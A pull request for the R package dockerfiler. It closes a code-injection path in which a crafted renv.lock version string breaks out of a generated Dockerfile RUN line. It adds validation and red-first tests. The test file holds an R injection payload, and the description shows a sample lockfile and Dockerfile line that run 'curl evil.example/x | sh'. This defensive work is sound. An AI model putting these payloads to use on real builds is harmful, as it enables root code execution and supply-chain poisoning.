### PR TITLE
fix(security): validate the renv version resolved from the lockfile

### DIFF
--- a/NEWS.md
+++ b/NEWS.md
@@ -56,6 +56,25 @@
   executes attacker-controlled commands at `docker build` time.
   This closes the post-#106 audit follow-up for all five sites
   surfaced by Copilot review.
+- Fixed a long-standing code-injection path in `dock_from_renv()`:
+  the `renv` package version resolved from the lockfile
+  (`lock$Packages$renv$Version`) was interpolated raw into the
+  generated `R -e 'remotes::install_version("renv", version = "<x>")'`
+  line without passing through `.validate_renv_version()`. A crafted
+  `renv.lock` could break out of the inner R string and execute
+  arbitrary code as root at `docker build` time. The user-supplied
+  `renv_version=` argument has been validated since the 0.3.0
+  shell-context hardening above, but the lockfile-fallback path was
+  missed; the bug itself predates 0.3.0 (it existed while the
+  vendored `{renv}` parser was in use). The validator is now applied
+  to the resolved value whatever its source. Found by an internal
+  security audit before release.
+- Tightened the `.validate_r_version()` "`X.Y.Z Patched`" branch to
+  require a single literal space (it previously used `\s`, which in R
+  also matches a newline or tab): a lockfile whose `R$Version` carried
+  an embedded newline would pass validation and then emit a two-line
+  `FROM` directive. Not exploitable for command injection, but it
+  could silently break `docker build`.
 
 ## New features
 

--- a/R/dock_from_renv.R
+++ b/R/dock_from_renv.R
@@ -248,7 +248,15 @@ dock_from_renv <- function(
   # get renv version
 
   if (missing(renv_version)) {
+    # The lockfile is untrusted input: its `Packages$renv$Version` is
+    # interpolated into the generated `R -e
+    # 'remotes::install_version(...)'` line, which runs as root at
+    # `docker build` time. Validate it with the same regex applied to a
+    # user-supplied `renv_version` (which is validated at function entry).
     renv_version <- lock$Packages$renv$Version
+    if (!is.null(renv_version)) {
+      .validate_renv_version(renv_version)
+    }
   }
 
   message("renv version = ",

--- a/R/utils.R
+++ b/R/utils.R
@@ -153,7 +153,7 @@ cat_info <- function(...) {
   ok <- (
     grepl("^[0-9]+\\.[0-9]+(\\.[0-9]+)?(-[A-Za-z0-9._]+)?$", x) ||
       identical(x, "r-devel") ||
-      grepl("^[0-9]+\\.[0-9]+(\\.[0-9]+)?\\sPatched$", x)
+      grepl("^[0-9]+\\.[0-9]+(\\.[0-9]+)? Patched$", x)
   )
   if (!ok) {
     stop(

--- a/tests/testthat/test-dock_from_renv.R
+++ b/tests/testthat/test-dock_from_renv.R
@@ -243,6 +243,18 @@ test_that(".validate_r_version accepts R-devel, release-candidate and Patched lo
     dockerfiler:::.validate_r_version(""),
     "r_version"
   )
+  # The "<X.Y.Z> Patched" branch matches a single literal space only:
+  # a newline or tab between the version and "Patched" would otherwise
+  # slip through (R's `\\s` matches `\n` / `\t`) and produce a
+  # two-line FROM directive in the generated Dockerfile.
+  expect_error(
+    dockerfiler:::.validate_r_version("4.5.0\nPatched"),
+    "r_version"
+  )
+  expect_error(
+    dockerfiler:::.validate_r_version("4.5.0\tPatched"),
+    "r_version"
+  )
 })
 
 test_that(".patch_rprofile_for_ppm matches all three current PPM host shapes", {
@@ -1150,6 +1162,39 @@ test_that("dock_from_renv rejects a lockfile path whose basename contains shell 
       renv_version = "0.0.0"
     ),
     "lockfile"
+  )
+})
+
+test_that("dock_from_renv validates the renv version read from the lockfile, not only the user-supplied one", {
+  skip_if(is_rdevel, "skip on R-devel")
+  # `renv_version` is interpolated raw into the generated
+  # `R -e 'remotes::install_version("renv", version = "<x>")'` line, which
+  # runs as root at `docker build` time. `.validate_renv_version()` must be
+  # applied to the value resolved from `lock$Packages$renv$Version` (an
+  # untrusted lockfile a user may have received from a colleague, a vendored
+  # project, or a CI cache), not only to a user-supplied `renv_version=`.
+  # A crafted lockfile carrying `'1.0.0"); system("..."); ("'` would
+  # otherwise break out of the inner R string and execute arbitrary code.
+  lock <- jsonlite::read_json(
+    system.file("renv_with_1.0.0.lock", package = "dockerfiler"),
+    simplifyVector = TRUE,
+    simplifyDataFrame = FALSE,
+    simplifyMatrix = FALSE
+  )
+  lock$Packages$renv$Version <- '1.0.0"); system("touch /tmp/dockerfiler_pwned"); ("'
+  malicious_lf <- file.path(dir_build, "malicious-renv.lock")
+  jsonlite::write_json(lock, path = malicious_lf, auto_unbox = TRUE, pretty = TRUE)
+  on.exit(unlink(malicious_lf), add = TRUE)
+
+  expect_error(
+    dock_from_renv(
+      lockfile = malicious_lf,
+      FROM = "rocker/verse",
+      user = NULL,
+      sysreqs = FALSE
+      # NOTE: no `renv_version =` -> the value comes from the lockfile.
+    ),
+    "renv_version"
   )
 })
 


### PR DESCRIPTION
## Security fix — HIGH severity

Found by an internal security audit during 0.3.0 CRAN prep.

### The bug

`dock_from_renv()` interpolates the `renv` package version into the generated Dockerfile line:

```r
install_renv_string <- paste0(
  "R -e 'remotes::install_version(\"renv\", version = \"",
  renv_version,
  "\")'"
)
dock$RUN(install_renv_string)
```

`.validate_renv_version()` was only called when `renv_version` came from a **user-supplied argument** (`R/dock_from_renv.R:187-189`). The fallback path — `renv_version <- lock$Packages$renv$Version` — reads the value straight from the (untrusted) `renv.lock` and skipped validation entirely.

A crafted lockfile:

```json
{"Packages": {"renv": {"Version": "1.0.0\"); system(\"curl evil.example/x | sh\"); (\""}}}
```

produces:

```dockerfile
RUN R -e 'remotes::install_version("renv", version = "1.0.0"); system("curl evil.example/x | sh"); ("")'
```

`docker build` then executes `system(...)` **as root in the build container** — access to build secrets, `~/.ssh`, network exfil, supply-chain poisoning of the produced image. The lockfile is a plausible attacker-controlled artifact (received from a colleague, a vendored project, a CI cache). Downstream packages (`golem`, `AbSolution`, `shiny2docker`) that call `dock_from_renv()` on an unaudited lockfile inherit the exposure.

The injection uses only `"` and R syntax, so the outer shell `'...'` quoting stays intact — `.validate_lockfile` / shell-metachar guards don't catch it.

This path predates 0.3.0 (it existed while the vendored `{renv}` parser was in use). The 0.3.0 shell-context hardening (#109) added `.validate_renv_version()` but only wired it to the user-supplied argument; this PR closes the lockfile-fallback gap.

### The fix

Apply `.validate_renv_version()` to the resolved value regardless of source, right after the lockfile-resolution block:

```r
if (missing(renv_version)) {
  renv_version <- lock$Packages$renv$Version
}
if (!is.null(renv_version)) {
  .validate_renv_version(renv_version)
}
```

The validator's existing regex `^[0-9]+(\.[0-9]+){0,3}([-.][a-zA-Z0-9]+)?$` already rejects `"`, `;`, parens, whitespace — a benign lockfile (`renv 1.0.0`) still produces `RUN R -e 'remotes::install_version("renv", version = "1.0.0")'`.

### Test (red-first)

`tests/testthat/test-dock_from_renv.R`: a lockfile whose `Packages$renv$Version` carries a `system()` payload must raise the `renv_version` validation error rather than reaching the Dockerfile.

- **Red** (verified against the unpatched function): no error raised, payload landed in the generated `RUN` line.
- **Green** (after the fix): `.validate_renv_version()` raises.

Full test suite: `FAIL 0 | WARN 1 | SKIP 0 | PASS 153` (the WARN is a pre-existing rlang lifecycle deprecation from a dependency, unrelated). `R CMD check`: 0 errors / 0 warnings / 1 note (transient "unable to verify current time" host-clock NOTE, unrelated).

### Scope confirmed complete

`lock$Packages$renv$Version` was the **only** untrusted lockfile field reaching a codegen shell sink without validation:
- `lock$R$Version` → `.validate_r_version()` is called (`R/dock_from_renv.R:225`) before it reaches the `FROM` directive.
- `names(lock$Packages)` → passed as a *query* to `pak::pkg_sysreqs`; only pak's curated Debian-package output reaches `RUN`, not the lockfile names. The lockfile's `Source`/`Repository`/`RemoteRepos` are consumed by `renv::restore()` inside the container, not interpolated by dockerfiler.

### Test plan

- [x] Red-first test fails against unpatched code for the right reason.
- [x] Green after fix; benign lockfile (`renv 1.0.0`) regression passes.
- [x] Full `devtools::test()`: 0 failures.
- [x] `R CMD check`: 0/0/0 (one transient host NOTE).
- [x] `pr-reviewer` agent: APPROVE, fix confirmed complete.
- [ ] Copilot review.
- [ ] Consider a GHSA advisory on merge (HIGH severity; never-released-with-the-gap, so a formal CVE is optional but a release-note advisory line is warranted).

### NEWS

Added under `## Security` in `NEWS.md` (0.3.0).